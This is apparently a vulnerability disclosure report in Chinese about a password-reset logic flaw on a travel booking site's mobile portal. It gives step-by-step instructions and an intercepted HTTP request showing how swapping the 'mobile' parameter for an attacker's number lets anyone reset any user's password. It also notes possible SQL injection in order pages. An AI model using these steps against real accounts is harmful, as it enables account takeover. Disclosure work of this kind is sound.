存在问题的站点为“畅途网-3G炫彩版-QQ手机浏览器合作版”!

域名:qq3g.trip8080.com

1.点击忘记密码;

畅图网逻辑设计缺陷导致可修改任意用户密码及修复

2.输入需要找回的用户名;

畅图网逻辑设计缺陷导致可修改任意用户密码及修复

3.畅图网在注册的时候都需要输入手机号码做验证,所以每个用户都绑定了一个手机号码,直接使用手机进行密码找回;

畅图网逻辑设计缺陷导致可修改任意用户密码及修复

4.点击手机找回密码并抓包;

POST /user/findPwdMobile.htm HTTP/1.1

Host: qq3g.trip8080.com

Proxy-Connection: keep-alive

Content-Length: 25

Cache-Control: max-age=0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Origin:

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Referer:

Accept-Encoding: gzip,deflate,sdch

Accept-Language: zh-CN,zh;q=0.8

Cookie: ...

mobile=135........&email=

5.这里将“mobile”参数值修改为我们需要为攻击者的手机号码“136.......”并提交;

畅图网逻辑设计缺陷导致可修改任意用户密码及修复

6.这里未校验手机号码是否归属该用户,导致攻击者成功接收到验证码,填入验证码成功来到密码重置阶段;

畅图网逻辑设计缺陷导致可修改任意用户密码及修复

7.填入密码即可!

另外,发现存在sql注入,post请求能够get方式提交,对用户输入过滤不严呀,只是利用不易!

订单查询;

畅图网逻辑设计缺陷导致可修改任意用户密码及修复

订单支付:

畅图网逻辑设计缺陷导致可修改任意用户密码及修复



 

修复方案:

1)严格校验用户身份!